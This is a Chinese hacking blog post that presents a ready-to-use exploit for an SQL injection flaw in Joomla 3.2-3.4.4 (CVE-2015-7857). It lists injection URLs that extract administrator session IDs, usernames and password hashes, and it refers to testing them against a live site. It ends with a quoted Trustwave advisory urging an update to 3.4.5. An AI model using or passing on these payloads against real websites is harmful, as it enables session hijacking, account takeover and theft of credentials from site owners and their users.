注册 登录  
 加关注
   显示下一条  |  关闭
温馨提示!由于新浪微博认证机制调整,您的新浪微博帐号绑定已过期,请重新绑定!立即重新绑定新浪微博》  |  关闭

K8拉登哥哥's Blog

K8搞基大队[K8team] 信息安全 网络安全 0day漏洞 渗透测试 黑客

 
 
 

日志

 
 

[EXP]joomla 3.2-3.4.4 SQL注入漏洞  

2015-10-23 17:51:41|  分类: Web_0day |  标签: |举报 |字号 订阅

  下载LOFTER 我的照片书  |
[EXP]joomla 3.2-3.4.4 SQL注入漏洞EXP

FILE: /administrator /components /com_contenthistory/ models/history.php is vulnerable to SQL injection:

EXP
/index.php?option=com_contenthistory&view=history&list[ordering]=&item_id=1&type_id=1 &list[select]= (select 1 FROM(select count(*),concat((select (select concat(session_id)) FROM pblqz_session LIMIT 0,1),floor(rand(0)*2))x FROM information_schema.tables GROUP BY x)a)

获取管理员密码
/index.php?option=com_contenthistory&view=history&list[ordering]=&item_id=1&type_id=1&list[select]=(select 1 from (select count(*),concat((select (select concat(username)) from %23__users limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)

/index.php?option=com_contenthistory&view=history&list[ordering]=&item_id=1&type_id=1&list[select]=(select 1 from (select count(*),concat((select (select concat(password)) from %23__users limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
实战某站 回显页面
[EXP]joomla 3.2-3.4.4 SQL注入漏洞EXP - K8拉登哥哥 - K8拉登哥哥s Blog
 
POC
index.php?option=com_contenthistory&view=history&list[select]=1

[EXP]joomla 3.2-3.4.4 SQL注入漏洞EXP - K8拉登哥哥 - K8拉登哥哥s Blog
 
3.2.0 本地回显页面
[EXP]joomla 3.2-3.4.4 SQL注入漏洞EXP - K8拉登哥哥 - K8拉登哥哥s Blog

https://www.trustwave.com/Resources/SpiderLabs-Blog/Joomla-SQL-Injection-Vulnerability-Exploit-Results-in-Full-Administrative-Access/

Trustwave SpiderLabs researcher Asaf Orpani has discovered an SQL injection vulnerability in versions 3.2 through 3.4.4 of Joomla, a popular open-source Content Management System (CMS). Combining that vulnerability with other security weaknesses, our Trustwave SpiderLabs researchers are able to gain full administrative access to any vulnerable Joomla site.

Joomla had a 6.6 percent share of the market for website CMSs as of October 20, 2015 according to W3Techs—second only to WordPress. Internet services company BuiltWith estimates that as many as 2.8 million websites worldwide use Joomla.

CVE-2015-7297, CVE-2015-7857, and CVE-2015-7858 cover the SQL injection vulnerability and various mutations related to it.

CVE-2015-7857 enables an unauthorized remote user to gain administrator privileges by hijacking the administrator session. Following exploitation of the vulnerability, the attacker may gain full control of the web site and execute additional attacks.

    The vulnerability can be exploited in Joomla versions 3.2 (released in November 2013) through version 3.4.4.
    Because the vulnerability is found in a core module that doesn't require any extensions, all websites that use Joomla versions 3.2 and above are vulnerable.
    Asaf also uncovered the related vulnerabilities CVE-2015-7858 and CVE-2015-7297 as part of his research.

Trustwave SpiderLabs recommends that ALL Joomla users update their Joomla installations to version 3.4.5. Version 3.4.5 is dedicated to fixing this security issue and was released Thursday, October 22 at approximately 14:00 UTC.
  评论这张
 
阅读(2866)| 评论(0)
推荐 转载

历史上的今天

在LOFTER的更多文章

评论

<#--最新日志,群博日志--> <#--推荐日志--> <#--引用记录--> <#--博主推荐--> <#--随机阅读--> <#--首页推荐--> <#--历史上的今天--> <#--被推荐日志--> <#--上一篇,下一篇--> <#-- 热度 --> <#-- 网易新闻广告 --> <#--右边模块结构--> <#--评论模块结构--> <#--引用模块结构--> <#--博主发起的投票-->
 
 
 
 
 
 
 
 
 
 
 
 
 
 

页脚

网易公司版权所有 ©1997-2016